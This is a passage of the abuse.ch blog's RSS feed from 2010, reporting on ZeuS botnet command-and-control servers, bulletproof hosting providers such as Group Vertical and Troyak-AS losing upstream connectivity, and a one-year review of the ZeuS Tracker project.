<p><a href="http://www.abuse.ch/wp-content/FastFluxhostedccs.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/FastFluxhostedccs.jpg" alt="" title="FastFlux hosted ZeuS C&amp;Cs" width="439" height="190" class="aligncenter size-full wp-image-2525" /></a></p>
<p>Currently there are just 9 domains hosted on a FastFlux botnet. But let&#8217;s see how many ZeuS C&#038;Cs will move over to FastFlux hosting during the next few month.</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2515' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2515&amp;title=ZeuS: Cybercriminals moving over to FastFlux Hosting' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2515&amp;title=ZeuS: Cybercriminals moving over to FastFlux Hosting' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2515' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2515&amp;title=ZeuS: Cybercriminals moving over to FastFlux Hosting' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2515&amp;bm_description=ZeuS: Cybercriminals moving over to FastFlux Hosting' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2515&amp;t=ZeuS: Cybercriminals moving over to FastFlux Hosting' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2515&amp;title=ZeuS: Cybercriminals moving over to FastFlux Hosting' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2515' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2515#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/8yF5BcaJTCI83Z8osNnzPynNnQE/0/da"><img src="http://feedads.g.doubleclick.net/~a/8yF5BcaJTCI83Z8osNnzPynNnQE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/8yF5BcaJTCI83Z8osNnzPynNnQE/1/da"><img src="http://feedads.g.doubleclick.net/~a/8yF5BcaJTCI83Z8osNnzPynNnQE/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/OBQDPbbjUZo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2515</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2515</feedburner:origLink></item>
		<item>
		<title>And another Bulletproof Hoster goes Offline…</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/J3_jUxPIBds/</link>
		<comments>http://www.abuse.ch/?p=2496#comments</comments>
		<pubDate>Thu, 18 Mar 2010 08:57:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[AS49365]]></category>
		<category><![CDATA[Group Vertical Ltd]]></category>
		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2496</guid>
		<description><![CDATA[A friend over MDL just informed me today that another bulletproof hoster called GR-VERTICAL-AS Group Vertical Ltd (AS49365)  has gone offline this night. Back in october 2009 I wrote a blog post about this ISP (see Source of badness: Group Vertical Ltd (AS49365)) and described how bad this ISP is. A few days later, [...]]]></description>
			<content:encoded><![CDATA[<p>A friend over <a href="http://www.malwaredomainlist.com" target="_blank">MDL</a> just informed me today that another bulletproof hoster called <strong>GR-VERTICAL-AS Group Vertical Ltd (AS49365)</strong>  has gone offline this night. Back in october 2009 I wrote a blog post about this ISP (see <a href="http://www.abuse.ch/?p=2024" target="_blank">Source of badness: Group Vertical Ltd (AS49365)</a>) and described how bad this ISP is. A few days later, <em>Groupe Vertical</em> has been <a href="http://www.abuse.ch/?p=2060" target="_blank">disconnected from the internet</a>. Unfortunately, the bad guys just managed to get online again.</p>
<p>Now it seems that this night their upstream provider <strong>VLineTelecom LLC Moscow (AS39150)</strong> just cut their peering with <strong>Group Vertical</strong>:</p>
<div class="codesnip-container" >GR-VERTICAL-AS Group Vertical Ltd<br />
<strong>NOT Announced</strong></p>
<p>This AS is not currently used to announce prefixes in the global routing table, nor is it used as a visible transit AS.</p>
<p>Prefixes added and withdrawn by this origin AS in the past 7 days.<br />
- 91.212.220.0/24 <strong> Withdrawn</strong></div>
<p>As of yesterday, this ISP has hosted <strong>20 ZeuS C&#038;C servers</strong> in their subnet:</p>
<p><a href="http://www.abuse.ch/wp-content/AS49365.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/AS49365-300x139.jpg" alt="" title="AS49365 - Group Vertical Ltd" width="300" height="139" class="aligncenter size-medium wp-image-2497" /></a></p>
<p>Due to the fact that <em>Group Vertical</em> is offline again, the number of active ZeuS C&#038;C server will just drop again today! But there is even more work left to do:</p>
<ul>
<li><a href="https://zeustracker.abuse.ch/monitor.php?as=49544" target="_blank">AS49544 (INTERACTIVE3D-AS Interactive3D)</a></li>
<li><a href="https://zeustracker.abuse.ch/monitor.php?as=29371" target="_blank">AS29371 (GAZTRANZITSTROYINFO-AS LLC _Gaztransitstroyinfo_)</a></li>
<li><a href="https://zeustracker.abuse.ch/monitor.php?as=34305" target="_blank">AS34305 (EUROACCESS Euroaccess Global Autonomous System)</a></li>
</ul>
<p>Let&#8217;s see how long these ISPs will stay online&#8230;.</p>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2496' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2496&amp;title=And another Bulletproof Hoster goes Offline&#8230;' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2496&amp;title=And another Bulletproof Hoster goes Offline&#8230;' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2496' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2496&amp;title=And another Bulletproof Hoster goes Offline&#8230;' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2496&amp;bm_description=And another Bulletproof Hoster goes Offline&#8230;' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2496&amp;t=And another Bulletproof Hoster goes Offline&#8230;' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2496&amp;title=And another Bulletproof Hoster goes Offline&#8230;' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2496' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2496#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/9TFrpL2R81lC4NZznrGhokRc714/0/da"><img src="http://feedads.g.doubleclick.net/~a/9TFrpL2R81lC4NZznrGhokRc714/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/9TFrpL2R81lC4NZznrGhokRc714/1/da"><img src="http://feedads.g.doubleclick.net/~a/9TFrpL2R81lC4NZznrGhokRc714/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/J3_jUxPIBds" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2496</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2496</feedburner:origLink></item>
		<item>
		<title>Massive Drop in Number of Active Zeus C&amp;C Servers</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/mn7JWYfR8Ho/</link>
		<comments>http://www.abuse.ch/?p=2417#comments</comments>
		<pubDate>Wed, 10 Mar 2010 15:10:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[AS50033]]></category>
		<category><![CDATA[AS50215]]></category>
		<category><![CDATA[GROUP3-AS]]></category>
		<category><![CDATA[troyak-as]]></category>
		<category><![CDATA[Zbot]]></category>
		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2417</guid>
		<description><![CDATA[I always check the ZeuS Tracker statistics to get some information about the trend of the active ZeuS Command&#038;Control servers. This morning I was really surprised what I saw on the ZeuS Tracker statistic page:

Massive drop of active ZeuS C&#038;C servers on 2010-03-09
As you can see in the chart above, on March 9th 2010, the [...]]]></description>
			<content:encoded><![CDATA[<p>I always check the ZeuS Tracker statistics to get some information about the trend of the active ZeuS Command&#038;Control servers. This morning I was really surprised what I saw on the <a href="https://zeustracker.abuse.ch/statistic.php" target="_blank">ZeuS Tracker statistic page</a>:</p>
<p><a href="http://www.abuse.ch/wp-content/massivezeusccdrop.png" target="_blank"><img src="http://www.abuse.ch/wp-content/massivezeusccdrop-300x96.png" alt="" title="ZeuS Tracker Statistic" width="300" height="96" class="aligncenter size-medium wp-image-2425" /></a><br />
<center><em>Massive drop of active ZeuS C&#038;C servers on 2010-03-09</em></center></p>
<p>As you can see in the chart above, on March 9th 2010, the number of active ZeuS C&#038;C servers dropped from <strong>249</strong> to <strong>181</strong>! The first thing I thought was: There has to be some problem with the ZeuS Tracker cron script. I checked the script &#8211; everything looked ok. So the massive drop of ZeuS C&#038;C server is fact. I noticed that <strong>six</strong> of the worst ZeuS hosting ISP suddently dissapeared from the ZeuS Tracker.</p>
<p>I verified the subnets of the affected ISP and came to the conclusion that <strong>Troyak-as (AS50215)</strong>, the upstream provider for the six worst ZeuS hosting ISPs, was cut from the internet on 2010-03-09. As a result, the following ISPs lost their internet connetivity which finally resulted in a <strong>massiv drop in the number of active ZeuS C&#038;C servers</strong>:</p>
<div class="codesnip-container" >AS number: <a href="http://www.robtex.com/as/as50390.html" target="_blank">AS50390</a><br />
AS name: SMILA-AS Pavlenko Tetyana Oleksandrivna<br />
Subnet: 193.105.0.0/24<br />
Status: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS50390" target="_blank">Withdrawn</a><br />
# of ZeuS C&#038;Cs: <strong>17</strong><br />
Spamhaus SBL: Not listed</p>
<p>AS number <a href="http://www.robtex.com/as/as42229.html" target="_blank">AS42229</a><br />
AS name: MARIAM-AS PP Mariam<br />
Subnet: 91.201.196.0/22<br />
Status: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS42229" target="_blank">Withdrawn</a><br />
# of ZeuS C&#038;Cs: <strong>18</strong><br />
Spamhaus SBL: <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL86729" target="_blank">#SBL86729</a></p>
<p>AS number: <a href="http://www.robtex.com/as/as49934.html" target="_blank">AS49934</a><br />
AS name: VVPN-AS PE Voronov Evgen Sergiyovich<br />
Subnet: 193.104.41.0/24<br />
Status: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS49934" target="_blank">Withdrawn</a><br />
# of ZeuS C&#038;Cs: <strong>8</strong><br />
Spamhaus SBL: <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL82374" target="_blank">#SBL82374</a></p>
<p>AS number: <a href="http://www.robtex.com/as/as44107.html" target="_blank">AS44107</a><br />
AS name: PROMBUDDETAL-AS Prombuddetal LLCst<br />
Subnet: 91.201.28.0/22<br />
Status: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS44107" target="_blank">Withdrawn</a><br />
# of ZeuS C&#038;Cs: <strong>5</strong><br />
Spamhaus SBL: <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL82408" target="_blank">#SBL82408</a></p>
<p>AS number: <a href="http://www.robtex.com/as/as50033.html" target="_blank">AS50033</a><br />
AS name: GROUP3-AS GROUP 3 LLC.<br />
Subnet: 193.104.94.0/24<br />
Status: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS50033" target="_blank">Withdrawn</a><br />
# of ZeuS C&#038;Cs: <strong>8</strong><br />
Spamhaus SBL: <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL85667" target="_blank">#SBL85667</a></p>
<p>AS number: <a href="http://www.robtex.com/as/as50033.html" target="_blank">AS12604</a><br />
AS name: CITYGAME-AS Kamushnoy Vladimir Vasulyovich<br />
Subnet: 193.104.27.0/24<br />
Status: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS12604" target="_blank">Withdrawn</a><br />
# of ZeuS C&#038;Cs: <strong>12</strong><br />
Spamhaus SBL: <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL81900" target="_blank">#SBL81900</a></div>
<p>In total, <strong>68</strong> went down &#8211; It was the biggest drop in number of ZeuS C&#038;C servers I&#8217;ve ever seen! Some guys have done a great job <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><strong> *** UPDATE 21:03 (UTC) ***</strong><br />
Bad news &#8211; it seem that <em>TROYAK-AS</em> has found a new upstream provider to serve their malware to the world:</p>
<div class="codesnip-container" ><strong>AS50215 TROYAK-AS Starchenko Roman Fedorovich</strong></p>
<p>Upstream Adjacent AS list<br />
<strong>AS44051 YA-AS Professional Communication Systems</strong></div>
<p>Source: <a href="http://cidr-report.org/cgi-bin/as-report?as=AS50215">http://cidr-report.org/cgi-bin/as-report?as=AS50215</a></p>
<p>As you can see on <a href="http://www.robtex.com/as/as44051.html#graph" target="_blank">Robtex</a>, YA-AS has just one upstream provider called <strong>NASSIST-AS (AS29632)</strong>. Let&#8217;s hope that this is just the last breath of TROYAK-AS and that NASSIST-AS will cut their peerings with <strong>YA-AS</strong> quickly.</p>
<p><strong>*** STATUS 2010-03-11 07:15 (UTC) ***</strong><br />
I just took another look into the ZeuS Tracker statistics &#8211; the number of active ZeuS C&#038;Cs is still falling! In total, I&#8217;ve counted <strong>104</strong> ZeuS C&#038;C servers which are no longer reachable from the internet!</p>
<p><a href="http://www.abuse.ch/wp-content/massivezeusccdropv2.png" target="_blank"><img src="http://www.abuse.ch/wp-content/massivezeusccdropv2-300x95.png" alt="" title="massivezeusccdropv2" width="300" height="95" class="aligncenter size-medium wp-image-2471" /></a><br />
<center><em>ZeuS Tracker statistics as of 2010-03-11</em></center></p>
<p>As mentioned on the last update from 21:03 UTC, Troyak just found a new upstream provider. This means: Troyak-AS is reconnected to the internet since yesterday.  Anyway, I just checked the those ZeuS C&#038;C servers which where routed by Troyak &#8211; <strong>all of them are still offline</strong>. </p>
<p><strong>*** UPDATE 2010-03-11 11:50 (UTC) ***</strong><br />
It&#8217;s a very busy day &#8211; Troyak is trying hard to get back online. This morning they disappeared again from the global BGP routing table and are now being routed by <strong>RTCOMM-AS (AS8342 RTComm.RU)</strong>, located in Russia:</p>
<div class="codesnip-container" >AS50215 TROYAK-AS Starchenko Roman Fedorovich</p>
<p>Upstream Adjacent AS list<br />
<strong>AS8342 RTCOMM-AS RTComm.RU Autonomous System</strong></div>
<p><strong>*** UPDATE 2010-03-11 21:30 (UTC)</strong><br />
Bad news: Since <em>Troyak</em> started their peering with <em>RTCOM-AS</em>, the number of active ZeuS C&#038;C servers has increasted from <strong>149</strong> up to <strong>191</strong>. For now, more than <strong>40</strong> ZeuS C&#038;C servers are back online! This means that the cybercriminals are now able to move the stolen data to a safe place or a backup server. Additionally, the cybercriminals are able to update their config files served to the infected clients to set up a fallback server (if Troyak will disappear from the internet again).</p>
<p><strong>*** UPDATE 2010-03-12 11:10 (UTC) ***</strong><br />
Another update: Troyak has changed their upstream provider again and is now being routed by <strong>NLINE-AS (AS25189 &#8211; JSC Nline)</strong>:</p>
<div class="codesnip-container" >AS50215 TROYAK-AS Starchenko Roman Fedorovich</p>
<p>Upstream Adjacent AS list<br />
<strong>AS25189 NLINE-AS JSC Nline</strong></div>
<p><strong>Further links</strong></p>
<ul>
<li><a href="https://zeustracker.abuse.ch" target="_blank">ZeuS Tracker</a></li>
<li><a href="http://www.robtex.com/as/as50215.html" target="_blank">Robtex: Troyak-as Starchenko Roman Fedorovich</a></li>
<li><a href="http://www.krebsonsecurity.com/2010/03/dozens-of-zeus-botnets-knocked-offline" target="_blank">Krebs on Security: Dozens of ZeuS Botnets Knocked Offline</a></li>
<li><a href="http://www.theregister.co.uk/2010/03/11/zeus_botnets_resurrected/" target="_blank">The Register: One-third of orphaned Zeus botnets find way home</a></li>
</ul>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2417' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2417&amp;title=Massive Drop in Number of Active Zeus C&#038;C Servers' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2417&amp;title=Massive Drop in Number of Active Zeus C&#038;C Servers' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2417' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2417&amp;title=Massive Drop in Number of Active Zeus C&#038;C Servers' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2417&amp;bm_description=Massive Drop in Number of Active Zeus C&#038;C Servers' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2417&amp;t=Massive Drop in Number of Active Zeus C&#038;C Servers' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2417&amp;title=Massive Drop in Number of Active Zeus C&#038;C Servers' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2417' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2417#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/w_nC94t-P2gSuMPm4E6B0P4MEA4/0/da"><img src="http://feedads.g.doubleclick.net/~a/w_nC94t-P2gSuMPm4E6B0P4MEA4/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/w_nC94t-P2gSuMPm4E6B0P4MEA4/1/da"><img src="http://feedads.g.doubleclick.net/~a/w_nC94t-P2gSuMPm4E6B0P4MEA4/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/mn7JWYfR8Ho" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2417</wfw:commentRss>
		<slash:comments>10</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2417</feedburner:origLink></item>
		<item>
		<title>Happy Birthday ZeuS Tracker!</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/IKrCKBX2oFE/</link>
		<comments>http://www.abuse.ch/?p=2363#comments</comments>
		<pubDate>Wed, 03 Feb 2010 19:29:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[Birthday]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2363</guid>
		<description><![CDATA[One year ago, on the 2nd of February 2009, ZeuS Tracker was born (Introducing: abuse.ch ZeuS Tracker BETA). Today ZeuS Tracker looks back to a very successful year and I would like to use this event to write some words about ZeuS Tracker. 
During the last year, ZeuS Tracker has tracked more then 2&#8242;800 malicious [...]]]></description>
			<content:encoded><![CDATA[<p>One year ago, on the 2nd of February 2009, <a href="https://zeustracker.abuse.ch/" target="_blank">ZeuS Tracker</a> was born (<a href="http://www.abuse.ch/?p=1037" target="_blank">Introducing: abuse.ch ZeuS Tracker BETA</a>). Today ZeuS Tracker looks back to a very successful year and I would like to use this event to write some words about ZeuS Tracker. </p>
<p>During the last year, ZeuS Tracker has tracked more then <strong>2&#8242;800</strong> malicious ZeuS C&#038;C servers. The ZeuS Tracker has captured more then <strong>360MB</strong> ZeuS config files and <strong>330MB</strong> binaries.</p>
<p>First of all let me say that the success story of ZeuS Tracker was made possible by <strong>you</strong>. <strong>You</strong>, the readers of my blog as well as the contributors of ZeuS Tracker are the heros. <strong>Your</strong> effort,  your avertising by word-of-mouth, your submission of new (unknown) ZeuS C&#038;C servers to ZeuS Tracker, your support, this is what allowed ZeuS Tracker to gain so much attention and success. During this year, I&#8217;ve recevied hundreds of emails with constructive feedback, questions and offers by people who wanted to contribute their work. <strong>Thank you!</strong></p>
<p>When ZeuS Tracker was started last year, the ZeuS C&#038;C servers which where listed on it were online for dozens of days (and even for months). Today, a year later, there are a lot of CERTs, registrars and ISPs following one of the <a href="https://zeustracker.abuse.ch/feeds.php" target="_blank">ZeuS Tracker RSS feeds</a> to quickly take down new ZeuS C&#038;Cs as soon as they get listed on ZeuS Tracker. Nowadays new C&#038;C servers are very often shut down only a few minutes after their appearing on ZeuS Tracker. In this way ZeuS Tracker (and the resoponsible ISPs, Registrars and CERTs) are taking a considerable effort and make the internet a safer place. <strong>Special thanks to all the ISPs, Registrars and CERTs around the world which are helping to shut down malicious ZeuS C&#038;C servers quickly!</strong></p>
<p>The ZeuS Tracker project would not be possible without the help of a handful organisations and people which are sharing information and providing ZeuS Tracker a home. So I decided to make a small &#8220;Hall of honor&#8221; for all of those.</p>
<h4>Hall of honor</h4>
<p>Time is come to say <em>thank you</em> to all which are supporting ZeuS Tracker. Special thank goes to&#8230;<br />
<center></p>
<table border="0">
<tr>
<td>
<a href="http://www.1und1.de/" target="_blank" title="1&#038;1 Internet AG"><img src="http://www.abuse.ch/wp-content/1und1-150x150.jpg" alt="1&amp;1 Internet AG" title="1&amp;1 Internet AG" width="150" height="150" class="aligncenter size-thumbnail wp-image-1976" /></a>
</td>
<td>
<a href="http://www.team-cymru.org/" target="_blank" title="Team Cymru"><img src="http://www.abuse.ch/wp-content/cymru_logo.gif" alt="Team Cymru" title="Team Cymru" width="175" height="138" class="aligncenter size-full wp-image-1977" /></a>
</td>
</tr>
<tr>
<td align="left">&#8230;for giving ZeuS Tracker a home</td>
<td align="right">&#8230; for providing the MHR to ZeuS Tracker</td>
</tr>
<tr>
<td><a href="http://www.iseclab.org/" target="_blank" title="isecLAB"><img src="http://www.abuse.ch/wp-content/logo.png" alt="isecLAB" title="isecLAB" width="150" height="63" class="aligncenter size-full wp-image-1986" /></a></td>
<td><a href="http://www.ikarus.at/" target="_blank" title="Ikarus Security Software"><img src="http://www.abuse.ch/wp-content/ikarus_logo.gif" alt="Ikarus Security Software" title="Ikarus Security Software" width="257" height="63" class="aligncenter size-full wp-image-2004" /></a></td>
</td>
<tr>
<td>&#8230;for providing Anubis to ZeuS Tracker</td>
<td>&#8230; for providing samples to ZeuS Tracker</td>
</tr>
<tr>
<td><a href="http://www.shadowserver.org/" target="_blank" title="Shadowserver"><img src="http://www.abuse.ch/wp-content/shadowServer_transp_2-500x167-300x67.png" alt="" title="Shadowserver Foundation" width="300" height="67" class="aligncenter size-medium wp-image-2365" /></a></td>
<td></td>
</tr>
<tr>
<td>&#8230;for providing samples to ZeuS Tracker</td>
<td></tr>
</table>
<p></center></p>
<p>Additionally I would like to thank <a href="http://www.malwaredomainlist.com" target="_blank" title="Malwaredomainlist MDL">Malwaredomainlist (MDL)</a> and <a href="http://www.malwareurl.com" target="_bkank">MalwareURL</a> for their cooperation in sharing malicious ZeuS C&#038;C servers.</p>
<p>During this year I received several queries asking for permission to integrate ZeuS Tracker information into commercial products. This was a very difficult decision for me to make and I considered the pros and cons of this for a considerable time. Finally I decided to allow the commercial use of ZeuS tracker blocklists to a few companies: My intention with ZeuS tracker was always to protect as many internet users as possible from becoming victims of identity theft. The fact that the use of ZeuS Tracker IP and domain blocklist in wide-used security products will decrease the number of victims of identity theft convinced me that this approach comes closest to my intentions. But the ZeuS Tracker information itself will always be provided free to everybody.</p>
<p>I&#8217;ve recived a handfull emails concerning a <em>commercial</em> use of the ZeuS Tracker IP- and domain blocklist in security products. So I had to made a leading decission. I&#8217;ve to say, that it was really hard for me to decide, but finally I came to the decission that I  allow the commercial use of ZeuS Tracker blocklist to a handfull companies. Let me explain you why: my goal was always to protect as much internet users as possible from getting victim of identity theft (This was also the reason why I released ZeuS Tracker Blocklist). I came to this decisioin due to the fact, that the use of ZeuS Tracker IP and domain blocklist in wide-used security products will decrease the number of victims of identity theft.</p>
<p>Below a list of organisation / sites which are using ZeuS Tracker in their services/products:</p>
<ul>
